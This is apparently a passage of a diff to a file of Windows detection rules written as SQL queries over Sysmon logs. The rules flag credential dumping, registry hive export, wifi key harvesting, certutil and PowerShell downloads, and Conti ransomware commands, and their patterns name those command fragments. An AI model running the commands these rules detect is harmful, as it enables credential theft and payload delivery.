username, model, etc.", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "title": "Potential DLL Injection Or Execution Using Tracker.exe", + "id": "148431ce-4b70-403d-8525-fcc2993f29ea", + "status": "test", + "description": "Detects potential DLL injection and execution using \"Tracker.exe\"", + "author": "Avneet Singh @v3t0_, oscd.community", "tags": [ - "attack.discovery", - "attack.execution", - "attack.t1047" + "attack.defense_evasion", + "attack.t1055.001" ], "falsepositives": [ "Unknown" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\wmic.exe' 
ESCAPE '\\' OR OriginalFileName = 'wmic.exe') AND CommandLine LIKE '%computersystem%' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((Image LIKE '%\\\\tracker.exe' ESCAPE '\\' OR Description = 'Tracker') AND (CommandLine LIKE '% /d %' ESCAPE '\\' OR CommandLine LIKE '% /c %' ESCAPE '\\')) AND NOT ((CommandLine LIKE '% /ERRORREPORT:PROMPT %' ESCAPE '\\') OR ((ParentImage LIKE '%\\\\Msbuild\\\\Current\\\\Bin\\\\MSBuild.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\Msbuild\\\\Current\\\\Bin\\\\amd64\\\\MSBuild.exe' ESCAPE '\\'))))" ], - "filename": "proc_creation_win_wmic_recon_computersystem.yml" + "filename": "proc_creation_win_lolbin_tracker.yml" }, { - "title": "Conhost Spawned By Suspicious Parent Process", - "id": "cbb9e3d1-2386-4e59-912e-62f1484f7a89", + "title": "Renamed Mavinject.EXE Execution", + "id": "e6474a1b-5390-49cd-ab41-8d88655f7394", "status": "experimental", - "description": "Detects when the Console Window Host (conhost.exe) process is spawned by a suspicious parent process, which could be indicative of code injection.", - "author": "Tim Rauch", + "description": "Detects the execution of a renamed version of the \"Mavinject\" process. 
Which can be abused to perform process injection using the \"/INJECTRUNNING\" flag", + "author": "frack113, Florian Roth", "tags": [ - "attack.execution", - "attack.t1059" + "attack.defense_evasion", + "attack.privilege_escalation", + "attack.t1055.001", + "attack.t1218.013" ], "falsepositives": [ - "Unknown" + "Unlikely" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\conhost.exe' ESCAPE '\\' AND (ParentImage LIKE '%\\\\svchost.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\lsass.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\services.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\smss.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\winlogon.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\explorer.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\rundll32.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\regsvr32.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\userinit.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\wininit.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\spoolsv.exe' ESCAPE '\\')) AND NOT ((ParentCommandLine LIKE '%-k apphost -s AppHostSvc%' ESCAPE '\\' OR ParentCommandLine LIKE '%-k imgsvc%' ESCAPE '\\' OR ParentCommandLine LIKE '%-k localService -p -s RemoteRegistry%' ESCAPE '\\' OR ParentCommandLine LIKE '%-k LocalSystemNetworkRestricted -p -s NgcSvc%' ESCAPE '\\' OR ParentCommandLine LIKE '%-k NetSvcs -p -s NcaSvc%' ESCAPE '\\' OR ParentCommandLine LIKE '%-k netsvcs -p -s NetSetupSvc%' ESCAPE '\\' OR ParentCommandLine LIKE '%-k netsvcs -p -s wlidsvc%' ESCAPE '\\' OR ParentCommandLine LIKE '%-k NetworkService -p -s DoSvc%' ESCAPE '\\' OR ParentCommandLine LIKE '%-k wsappx -p -s AppXSvc%' ESCAPE '\\' OR ParentCommandLine LIKE '%-k wsappx -p -s ClipSVC%' ESCAPE '\\' OR ParentCommandLine LIKE '%C:\\\\Program Files (x86)\\\\Dropbox\\\\Client\\\\%' ESCAPE '\\' OR ParentCommandLine LIKE '%C:\\\\Program Files\\\\Dropbox\\\\Client\\\\%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '1' AND 
Channel = 'Microsoft-Windows-Sysmon/Operational') AND OriginalFileName IN ('mavinject32.exe', 'mavinject64.exe') AND NOT ((Image LIKE '%\\\\mavinject32.exe' ESCAPE '\\' OR Image LIKE '%\\\\mavinject64.exe' ESCAPE '\\')))" ], - "filename": "proc_creation_win_conhost_susp_parent.yml" + "filename": "proc_creation_win_renamed_mavinject.yml" }, { - "title": "Renamed Msdt.EXE Execution", - "id": "bd1c6866-65fc-44b2-be51-5588fcff82b9", + "title": "Suspicious File Downloaded From Direct IP Via Certutil.EXE", + "id": "13e6fe51-d478-4c7e-b0f2-6da9b400a829", "status": "experimental", - "description": "Detects the execution of a renamed \"Msdt.exe\" binary", - "author": "pH-T (Nextron Systems)", + "description": "Detects the execution of certutil with certain flags that allow the utility to download files from direct IPs.", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ "attack.defense_evasion", - "attack.t1036.003" + "attack.t1027" ], "falsepositives": [ - "Unlikely" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND OriginalFileName = 'msdt.exe' AND NOT (Image LIKE '%\\\\msdt.exe' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((Image LIKE '%\\\\certutil.exe' ESCAPE '\\' OR OriginalFileName = 'CertUtil.exe') AND (CommandLine LIKE '%urlcache %' ESCAPE '\\' OR CommandLine LIKE '%verifyctl %' ESCAPE '\\') AND (CommandLine LIKE '%://1%' ESCAPE '\\' OR CommandLine LIKE '%://2%' ESCAPE '\\' OR CommandLine LIKE '%://3%' ESCAPE '\\' OR CommandLine LIKE '%://4%' ESCAPE '\\' OR CommandLine LIKE '%://5%' ESCAPE '\\' OR CommandLine LIKE '%://6%' ESCAPE '\\' OR CommandLine LIKE '%://7%' ESCAPE '\\' OR CommandLine LIKE '%://8%' ESCAPE '\\' OR CommandLine LIKE '%://9%' ESCAPE '\\')) AND NOT ((CommandLine LIKE '%://7-%' ESCAPE '\\')))" ], - "filename": "proc_creation_win_renamed_msdt.yml" + "filename": 
"proc_creation_win_certutil_download_direct_ip.yml" }, { - "title": "VsCode Child Process Anomaly", - "id": "5a3164f2-b373-4152-93cf-090b13c12d27", - "status": "experimental", - "description": "Detects uncommon or suspicious child processes spawning from a VsCode \"code.exe\" process. This could indicate an attempt of persistence via VsCode tasks or terminal profiles.", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "title": "Windows Processes Suspicious Parent Directory", + "id": "96036718-71cc-4027-a538-d1587e0006a7", + "status": "test", + "description": "Detect suspicious parent processes of well-known Windows processes", + "author": "vburov", "tags": [ - "attack.execution", "attack.defense_evasion", - "attack.t1218", - "attack.t1202" + "attack.t1036.003", + "attack.t1036.005" ], "falsepositives": [ - "In development environment where VsCode is used heavily. False positives may occur when developers use task to compile or execute different types of code. Remove or add processes accordingly" + "Some security products seem to spawn these" ], - "level": "medium", + "level": "low", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ParentImage LIKE '%\\\\code.exe' ESCAPE '\\' AND ((Image LIKE '%\\\\calc.exe' ESCAPE '\\' OR Image LIKE '%\\\\regsvr32.exe' ESCAPE '\\' OR Image LIKE '%\\\\rundll32.exe' ESCAPE '\\' OR Image LIKE '%\\\\cscript.exe' ESCAPE '\\' OR Image LIKE '%\\\\wscript.exe' ESCAPE '\\') OR ((Image LIKE '%\\\\powershell.exe' ESCAPE '\\' OR Image LIKE '%\\\\pwsh.exe' ESCAPE '\\' OR Image LIKE '%\\\\cmd.exe' ESCAPE '\\') AND (CommandLine LIKE '%Invoke-Expressions%' ESCAPE '\\' OR CommandLine LIKE '%IEX%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-Command%' ESCAPE '\\' OR CommandLine LIKE '%ICM%' ESCAPE '\\' OR CommandLine LIKE '%DownloadString%' ESCAPE '\\' OR CommandLine LIKE '%rundll32%' ESCAPE '\\' OR CommandLine LIKE '%regsvr32%' ESCAPE '\\' OR CommandLine LIKE '%wscript%' ESCAPE 
'\\' OR CommandLine LIKE '%cscript%' ESCAPE '\\')) OR (Image LIKE '%C:\\\\Users\\\\Public\\\\%' ESCAPE '\\' OR Image LIKE '%C:\\\\Windows\\\\Temp\\\\%' ESCAPE '\\' OR Image LIKE '%C:\\\\Temp\\\\%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\svchost.exe' ESCAPE '\\' OR Image LIKE '%\\\\taskhost.exe' ESCAPE '\\' OR Image LIKE '%\\\\lsm.exe' ESCAPE '\\' OR Image LIKE '%\\\\lsass.exe' ESCAPE '\\' OR Image LIKE '%\\\\services.exe' ESCAPE '\\' OR Image LIKE '%\\\\lsaiso.exe' ESCAPE '\\' OR Image LIKE '%\\\\csrss.exe' ESCAPE '\\' OR Image LIKE '%\\\\wininit.exe' ESCAPE '\\' OR Image LIKE '%\\\\winlogon.exe' ESCAPE '\\') AND NOT (((ParentImage LIKE '%\\\\SavService.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\ngen.exe' ESCAPE '\\') OR (ParentImage LIKE '%\\\\System32\\\\%' ESCAPE '\\' OR ParentImage LIKE '%\\\\SysWOW64\\\\%' ESCAPE '\\')) OR ((ParentImage LIKE '%\\\\Windows Defender\\\\%' ESCAPE '\\' OR ParentImage LIKE '%\\\\Microsoft Security Client\\\\%' ESCAPE '\\') AND ParentImage LIKE '%\\\\MsMpEng.exe' ESCAPE '\\') OR (ParentImage = '' OR ParentImage = '-')))" ], - "filename": "proc_creation_win_vscode_child_processes_anomalies.yml" + "filename": "proc_creation_win_susp_proc_wrong_parent.yml" }, { - "title": "Potential Windows Defender Tampering Via Wmic.EXE", - "id": "51cbac1e-eee3-4a90-b1b7-358efb81fa0a", + "title": "Ilasm Lolbin Use Compile C-Sharp", + "id": "850d55f9-6eeb-4492-ad69-a72338f65ba4", "status": "experimental", - "description": "Detects potential tampering with Windows Defender settings such as adding exclusion using wmic", + "description": "Detect use of Ilasm.exe to compile c# code into dll or exe.", "author": "frack113", "tags": [ - "attack.credential_access", - "attack.t1546.008" + "attack.defense_evasion", + "attack.t1127" ], "falsepositives": [ "Unknown" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND 
Channel = 'Microsoft-Windows-Sysmon/Operational') AND (OriginalFileName = 'wmic.exe' OR Image LIKE '%\\\\WMIC.exe' ESCAPE '\\') AND CommandLine LIKE '%/Namespace:\\\\\\\\root\\\\Microsoft\\\\Windows\\\\Defender%' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\ilasm.exe' ESCAPE '\\' OR OriginalFileName = 'ilasm.exe'))" ], - "filename": "proc_creation_win_wmic_namespace_defender.yml" + "filename": "proc_creation_win_lolbin_ilasm.yml" }, { - "title": "Suspicious Active Directory Database Snapshot Via ADExplorer", - "id": "ef61af62-bc74-4f58-b49b-626448227652", - "status": "experimental", - "description": "Detects the execution of Sysinternals ADExplorer with the \"-snapshot\" flag in order to save a local copy of the active directory database to a suspicious directory.", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "title": "Formbook Process Creation", + "id": "032f5fb3-d959-41a5-9263-4173c802dc2b", + "status": "test", + "description": "Detects Formbook like process executions that inject code into a set of files in the System32 folder, which executes a special command command line to delete the dropper from the AppData Temp folder. 
We avoid false positives by excluding all parent process with command line parameters.", + "author": "Florian Roth (Nextron Systems), oscd.community, Jonhnathan Ribeiro", "tags": [ - "attack.credential_access", - "attack.t1552.001", - "attack.t1003.003" + "attack.resource_development", + "attack.t1587.001" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\ADExplorer.exe' ESCAPE '\\' OR OriginalFileName = 'AdExp') AND CommandLine LIKE '%snapshot%' ESCAPE '\\' AND (CommandLine LIKE '%\\\\Downloads\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Users\\\\Public\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\AppData\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Windows\\\\Temp\\\\%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((ParentCommandLine LIKE 'C:\\\\Windows\\\\System32\\\\%' ESCAPE '\\' OR ParentCommandLine LIKE 'C:\\\\Windows\\\\SysWOW64\\\\%' ESCAPE '\\') AND ParentCommandLine LIKE '%.exe' ESCAPE '\\') AND ((CommandLine LIKE '%/c%' ESCAPE '\\' AND CommandLine LIKE '%del%' ESCAPE '\\' AND CommandLine LIKE '%C:\\\\Users\\\\%' ESCAPE '\\' AND CommandLine LIKE '%\\\\AppData\\\\Local\\\\Temp\\\\%' ESCAPE '\\') OR (CommandLine LIKE '%/c%' ESCAPE '\\' AND CommandLine LIKE '%del%' ESCAPE '\\' AND CommandLine LIKE '%C:\\\\Users\\\\%' ESCAPE '\\' AND CommandLine LIKE '%\\\\Desktop\\\\%' ESCAPE '\\') OR (CommandLine LIKE '%/C%' ESCAPE '\\' AND CommandLine LIKE '%type nul >%' ESCAPE '\\' AND CommandLine LIKE '%C:\\\\Users\\\\%' ESCAPE '\\' AND CommandLine LIKE '%\\\\Desktop\\\\%' ESCAPE '\\')) AND CommandLine LIKE '%.exe' ESCAPE '\\')" ], - "filename": "proc_creation_win_sysinternals_adexplorer_susp_execution.yml" + "filename": "proc_creation_win_malware_formbook.yml" }, { - "title": "Suspicious Scan Loop Network", - "id": "f8ad2e2c-40b6-4117-84d7-20b89896ab23", + "title": 
"Suspicious Diantz Alternate Data Stream Execution", + "id": "6b369ced-4b1d-48f1-b427-fdc0de0790bd", "status": "test", - "description": "Adversaries may attempt to get a listing of other systems by IP address, hostname, or other logical identifier on a network that may be used for Lateral Movement from the current system", + "description": "Compress target file into a cab file stored in the Alternate Data Stream (ADS) of the target file.", "author": "frack113", "tags": [ - "attack.execution", - "attack.t1059", - "attack.discovery", - "attack.t1018" + "attack.defense_evasion", + "attack.t1564.004" ], "falsepositives": [ - "Legitimate script" + "Very Possible" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND (CommandLine LIKE '%for %' ESCAPE '\\' OR CommandLine LIKE '%foreach %' ESCAPE '\\') AND (CommandLine LIKE '%nslookup%' ESCAPE '\\' OR CommandLine LIKE '%ping%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND CommandLine LIKE '%diantz.exe%' ESCAPE '\\' AND CommandLine LIKE '%.cab%' ESCAPE '\\' AND CommandLine REGEXP ':[^\\\\]')" ], - "filename": "proc_creation_win_susp_network_scan_loop.yml" + "filename": "proc_creation_win_lolbin_diantz_ads.yml" }, { - "title": "New Service Creation Using PowerShell", - "id": "c02e96b7-c63a-4c47-bd83-4a9f74afcfb2", + "title": "Potential Conti Ransomware Activity", + "id": "689308fc-cfba-4f72-9897-796c1dc61487", "status": "test", - "description": "Detects the creation of a new service using powershell.", - "author": "Timur Zinniatullin, Daniil Yugoslavskiy, oscd.community", + "description": "Detects a specific command used by the Conti ransomware group", + "author": "frack113", "tags": [ - "attack.persistence", - "attack.privilege_escalation", - "attack.t1543.003" + "attack.impact", + "attack.s0575", + "attack.t1486" ], "falsepositives": [ - "Legitimate administrator or user creates 
a service for legitimate reasons.", - "Software installation" + "Unlikely" ], - "level": "low", + "level": "critical", "rule": [ - "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND CommandLine LIKE '%New-Service%' ESCAPE '\\' AND CommandLine LIKE '%-BinaryPathName%' ESCAPE '\\')" + "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND CommandLine LIKE '%-m %' ESCAPE '\\' AND CommandLine LIKE '%-net %' ESCAPE '\\' AND CommandLine LIKE '%-size %' ESCAPE '\\' AND CommandLine LIKE '%-nomutex %' ESCAPE '\\' AND CommandLine LIKE '%-p \\\\\\\\\\*' ESCAPE '\\' AND CommandLine LIKE '%$%' ESCAPE '\\')" ], - "filename": "proc_creation_win_powershell_create_service.yml" + "filename": "proc_creation_win_malware_conti_ransomware_commands.yml" }, { - "title": "GfxDownloadWrapper.exe Downloads File from Suspicious URL", - "id": "eee00933-a761-4cd0-be70-c42fe91731e7", - "status": "test", - "description": "Detects when GfxDownloadWrapper.exe downloads file from non standard URL", - "author": "Victor Sergeev, oscd.community", + "title": "HackTool - Quarks PwDump Execution", + "id": "0685b176-c816-4837-8e7b-1216f346636b", + "status": "experimental", + "description": "Detects usage of the Quarks PwDump tool via commandline arguments", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.command_and_control", - "attack.t1105" + "attack.credential_access", + "attack.t1003.002" ], "falsepositives": [ - "Unknown" + "Unlikely" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND Image LIKE '%\\\\GfxDownloadWrapper.exe' ESCAPE '\\' AND NOT (CommandLine LIKE '%gameplayapi.intel.com%' ESCAPE '\\' AND (ParentImage LIKE '%\\\\GfxDownloadWrapper.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\igfxEM.exe' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 
'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\QuarksPwDump.exe' ESCAPE '\\' OR CommandLine IN (' -dhl', ' --dump-hash-local', ' -dhdc', ' --dump-hash-domain-cached', ' --dump-bitlocker', ' -dhd ', ' --dump-hash-domain ', '--ntds-file')))" ], - "filename": "proc_creation_win_lolbin_gfxdownloadwrapper_file_download.yml" + "filename": "proc_creation_win_hktl_quarks_pwdump.yml" }, { - "title": "Suspicious Service DACL Modification Via Set-Service Cmdlet", - "id": "a95b9b42-1308-4735-a1af-abb1c5e6f5ac", - "status": "experimental", - "description": "Detects suspicious DACL modifications via the \"Set-Service\" cmdlet using the \"SecurityDescriptorSddl\" flag (Only available with PowerShell 7) that can be used to hide services or make them unstopable", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "title": "Share And Session Enumeration Using Net.EXE", + "id": "62510e69-616b-4078-b371-847da438cc03", + "status": "stable", + "description": "Detects attempts to enumerate file shares, printer shares and sessions using \"net.exe\" with the \"view\" flag.", + "author": "Endgame, JHasenbusch (ported for oscd.community)", "tags": [ - "attack.persistence", - "attack.t1543.003" + "attack.discovery", + "attack.t1018" ], "falsepositives": [ - "Unknown" + "Legitimate use of net.exe utility by legitimate user" ], - "level": "high", + "level": "low", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\pwsh.exe' ESCAPE '\\' OR OriginalFileName = 'pwsh.dll') AND (CommandLine LIKE '%-SecurityDescriptorSddl %' ESCAPE '\\' OR CommandLine LIKE '%-sd %' ESCAPE '\\') AND (CommandLine LIKE '%Set-Service %' ESCAPE '\\' AND CommandLine LIKE '%D;;%' ESCAPE '\\' AND (CommandLine LIKE '%;;;IU%' ESCAPE '\\' OR CommandLine LIKE '%;;;SU%' ESCAPE '\\' OR CommandLine LIKE '%;;;BA%' ESCAPE '\\' OR CommandLine LIKE '%;;;SY%' ESCAPE '\\' OR CommandLine LIKE '%;;;WD%' ESCAPE '\\')))" + "SELECT * FROM 
logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (((Image LIKE '%\\\\net.exe' ESCAPE '\\' OR Image LIKE '%\\\\net1.exe' ESCAPE '\\') OR OriginalFileName IN ('net.exe', 'net1.exe')) AND CommandLine LIKE '%view%' ESCAPE '\\') AND NOT (CommandLine LIKE '%\\\\\\\\\\*' ESCAPE '\\'))" ], - "filename": "proc_creation_win_powershell_service_dacl_modification_set_service.yml" + "filename": "proc_creation_win_net_share_and_sessions_enum.yml" }, { - "title": "Harvesting Of Wifi Credentials Via Netsh.EXE", - "id": "42b1a5b8-353f-4f10-b256-39de4467faff", + "title": "Execution via CL_Invocation.ps1", + "id": "a0459f02-ac51-4c09-b511-b8c9203fc429", "status": "test", - "description": "Detect the harvesting of wifi credentials using netsh.exe", - "author": "Andreas Hunkeler (@Karneades), oscd.community", + "description": "Detects Execution via SyncInvoke in CL_Invocation.ps1 module", + "author": "oscd.community, Natalia Shornikova", "tags": [ - "attack.discovery", - "attack.credential_access", - "attack.t1040" + "attack.defense_evasion", + "attack.t1216" ], "falsepositives": [ "Unknown" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\netsh.exe' ESCAPE '\\' OR OriginalFileName = 'netsh.exe') AND (CommandLine LIKE '%wlan%' ESCAPE '\\' AND CommandLine LIKE '% s%' ESCAPE '\\' AND CommandLine LIKE '% p%' ESCAPE '\\' AND CommandLine LIKE '% k%' ESCAPE '\\' AND CommandLine LIKE '%=clear%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND CommandLine LIKE '%CL\\_Invocation.ps1%' ESCAPE '\\' AND CommandLine LIKE '%SyncInvoke%' ESCAPE '\\')" ], - "filename": "proc_creation_win_netsh_wifi_credential_harvesting.yml" + "filename": "proc_creation_win_lolbin_cl_invocation.yml" }, { - "title": "Exports Critical Registry Keys To a File", - "id": 
"82880171-b475-4201-b811-e9c826cd5eaa", - "status": "test", - "description": "Detects the export of a crital Registry key to a file.", - "author": "Oddvar Moe, Sander Wiebing, oscd.community", + "title": "Suspicious Invoke-WebRequest Execution", + "id": "5e3cc4d8-3e68-43db-8656-eaaeefdec9cc", + "status": "experimental", + "description": "Detects a suspicious call to Invoke-WebRequest cmdlet where the and output is located in a suspicious location", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.exfiltration", - "attack.t1012" + "attack.command_and_control", + "attack.t1105" ], "falsepositives": [ - "Dumping hives for legitimate purpouse i.e. backup or forensic investigation" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\regedit.exe' ESCAPE '\\' OR OriginalFileName = 'REGEDIT.EXE') AND (CommandLine LIKE '% /E %' ESCAPE '\\' OR CommandLine LIKE '% -E %' ESCAPE '\\') AND (CommandLine LIKE '%hklm%' ESCAPE '\\' OR CommandLine LIKE '%hkey\\_local\\_machine%' ESCAPE '\\') AND (CommandLine LIKE '%\\\\system' ESCAPE '\\' OR CommandLine LIKE '%\\\\sam' ESCAPE '\\' OR CommandLine LIKE '%\\\\security' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((Image LIKE '%\\\\powershell.exe' ESCAPE '\\' OR Image LIKE '%\\\\pwsh.exe' ESCAPE '\\') OR OriginalFileName IN ('PowerShell.EXE', 'pwsh.dll')) AND (CommandLine LIKE '%curl %' ESCAPE '\\' OR CommandLine LIKE '%Invoke-WebRequest%' ESCAPE '\\' OR CommandLine LIKE '%iwr %' ESCAPE '\\' OR CommandLine LIKE '%wget %' ESCAPE '\\') AND (CommandLine LIKE '% -ur%' ESCAPE '\\' OR CommandLine LIKE '% -o%' ESCAPE '\\') AND (CommandLine LIKE '%\\\\AppData\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Desktop\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Temp\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Users\\\\Public\\\\%' ESCAPE '\\' OR 
CommandLine LIKE '%\\%AppData\\%%' ESCAPE '\\' OR CommandLine LIKE '%\\%Public\\%%' ESCAPE '\\' OR CommandLine LIKE '%\\%Temp\\%%' ESCAPE '\\' OR CommandLine LIKE '%\\%tmp\\%%' ESCAPE '\\' OR CommandLine LIKE '%C:\\\\Windows\\\\%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_regedit_export_critical_keys.yml" + "filename": "proc_creation_win_powershell_invoke_webrequest_download.yml" }, { - "title": "PUA - Suspicious ActiveDirectory Enumeration Via AdFind.EXE", - "id": "455b9d50-15a1-4b99-853f-8d37655a4c1b", - "status": "experimental", - "description": "Detects active directory enumeration activity using known AdFind CLI flags", - "author": "frack113", + "title": "Suspicious Child Process Created as System", + "id": "590a5f4c-6c8c-4f10-8307-89afe9453a9d", + "status": "test", + "description": "Detection of child processes spawned with SYSTEM privileges by parents with LOCAL SERVICE or NETWORK SERVICE accounts", + "author": "Teymur Kheirkhabarov, Roberto Rodriguez (@Cyb3rWard0g), Open Threat Research (OTR)", "tags": [ - "attack.discovery", - "attack.t1087.002" + "attack.privilege_escalation", + "attack.t1134.002" ], "falsepositives": [ - "Authorized administrative activity" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((CommandLine LIKE '%lockoutduration%' ESCAPE '\\' OR CommandLine LIKE '%lockoutthreshold%' ESCAPE '\\' OR CommandLine LIKE '%lockoutobservationwindow%' ESCAPE '\\' OR CommandLine LIKE '%maxpwdage%' ESCAPE '\\' OR CommandLine LIKE '%minpwdage%' ESCAPE '\\' OR CommandLine LIKE '%minpwdlength%' ESCAPE '\\' OR CommandLine LIKE '%pwdhistorylength%' ESCAPE '\\' OR CommandLine LIKE '%pwdproperties%' ESCAPE '\\') OR CommandLine LIKE '%-sc admincountdmp%' ESCAPE '\\' OR CommandLine LIKE '%-sc exchaddresses%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((ParentUser LIKE '%AUTHORI%' ESCAPE 
'\\' OR ParentUser LIKE '%AUTORI%' ESCAPE '\\') AND (ParentUser LIKE '%\\\\NETWORK SERVICE' ESCAPE '\\' OR ParentUser LIKE '%\\\\LOCAL SERVICE' ESCAPE '\\') AND (User LIKE '%AUTHORI%' ESCAPE '\\' OR User LIKE '%AUTORI%' ESCAPE '\\') AND (User LIKE '%\\\\SYSTEM' ESCAPE '\\' OR User LIKE '%\\\\Système' ESCAPE '\\' OR User LIKE '%\\\\СИСТЕМА' ESCAPE '\\') AND IntegrityLevel = 'System') AND NOT ((Image LIKE '%\\\\rundll32.exe' ESCAPE '\\' AND CommandLine LIKE '%DavSetCookie%' ESCAPE '\\')))" ], - "filename": "proc_creation_win_pua_adfind_enumeration.yml" + "filename": "proc_creation_win_susp_child_process_as_system_.yml" }, { - "title": "Suspicious PowerShell Mailbox Export to Share", - "id": "889719ef-dd62-43df-86c3-768fb08dc7c0", + "title": "PsExec Service Execution", + "id": "fdfcbd78-48f1-4a4b-90ac-d82241e368c5", "status": "experimental", - "description": "Detects usage of the powerShell New-MailboxExportRequest Cmdlet to exports a mailbox to a remote or local share, as used in ProxyShell exploitations", - "author": "Florian Roth (Nextron Systems)", + "description": "Detects launch of the PSEXESVC service, which means that this system was the target of a psexec remote execution", + "author": "Thomas Patzke, Romaissa Adjailia, Florian Roth (Nextron Systems)", "tags": [ - "attack.exfiltration" + "attack.execution" ], "falsepositives": [ - "Unknown" + "Legitimate administrative tasks" ], - "level": "critical", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND CommandLine LIKE '%New-MailboxExportRequest%' ESCAPE '\\' AND CommandLine LIKE '% -Mailbox %' ESCAPE '\\' AND CommandLine LIKE '% -FilePath \\\\\\\\\\*' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE 'C:\\\\Windows\\\\PSEXESVC.exe' ESCAPE '\\' OR OriginalFileName = 'psexesvc.exe'))" ], - "filename": "proc_creation_win_powershell_mailboxexport_share.yml" 
+ "filename": "proc_creation_win_sysinternals_psexesvc.yml" }, { - "title": "Potential Active Directory Enumeration Using AD Module - ProcCreation", - "id": "70bc5215-526f-4477-963c-a47a5c9ebd12", - "status": "experimental", - "description": "Detects usage of the \"Import-Module\" cmdlet to load the \"Microsoft.ActiveDirectory.Management.dl\" DLL. Which is often used by attackers to perform AD enumeration.", - "author": "frack113", + "title": "PUA - NirCmd Execution As LOCAL SYSTEM", + "id": "d9047477-0359-48c9-b8c7-792cedcdc9c4", + "status": "test", + "description": "Detects the use of NirCmd tool for command execution as SYSTEM user", + "author": "Florian Roth (Nextron Systems), Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.reconnaissance", - "attack.discovery", - "attack.impact" + "attack.execution", + "attack.t1569.002", + "attack.s0029" ], 